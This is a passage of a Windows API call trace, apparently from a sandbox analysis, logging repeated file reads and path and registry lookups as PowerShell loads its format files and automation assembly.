hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.066] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.067] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.067] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.068] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.068] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.080] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.080] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.081] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.081] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.082] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.082] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.083] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.083] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.084] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.084] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.084] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.085] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.085] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.085] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.086] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.086] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.087] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.087] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.087] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.088] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.088] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.088] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.089] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.089] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.090] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.090] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.091] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.091] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.091] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.092] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.092] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0xf37, lpOverlapped=0x0) returned 1 [0091.092] ReadFile (in: hFile=0x314, lpBuffer=0x36d53ef, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d53ef*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.093] ReadFile (in: hFile=0x314, lpBuffer=0x36d5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36d5d50*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.093] CloseHandle (hObject=0x314) returned 1 [0091.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0091.093] SetErrorMode (uMode=0x1) returned 0x1 [0091.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0091.094] SetErrorMode (uMode=0x1) returned 0x1 [0091.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0091.094] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x314) returned 0x0 [0091.094] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0091.094] CoTaskMemAlloc (cb=0x5a) returned 0x30bea0 [0091.094] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30bea0, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0091.094] CoTaskMemFree (pv=0x30bea0) [0091.094] RegCloseKey (hKey=0x314) returned 0x0 [0091.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0091.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0091.144] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x72da15ac, Data2=0x611, Data3=0x416c, Data4=([0]=0xb4, [1]=0x10, [2]=0x9a, [3]=0x45, [4]=0x7a, [5]=0xfa, [6]=0xde, [7]=0x1c))) returned 0x0 [0091.145] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xfb11970e, Data2=0xb451, Data3=0x4a4f, Data4=([0]=0x9a, [1]=0x64, [2]=0xb2, [3]=0x84, [4]=0xe1, [5]=0xf7, [6]=0x4e, [7]=0x3c))) returned 0x0 [0091.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.218] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xd240a194, Data2=0x655c, Data3=0x4fa5, Data4=([0]=0xa8, [1]=0x8, [2]=0x83, [3]=0x21, [4]=0x63, [5]=0x9c, [6]=0x64, [7]=0xc8))) returned 0x0 [0091.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.237] VirtualQuery (in: lpAddress=0x16b760, lpBuffer=0x16c620, dwLength=0x30 | out: lpBuffer=0x16c620*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.239] VirtualQuery (in: lpAddress=0x16b7f0, lpBuffer=0x16c6b0, dwLength=0x30 | out: lpBuffer=0x16c6b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.241] 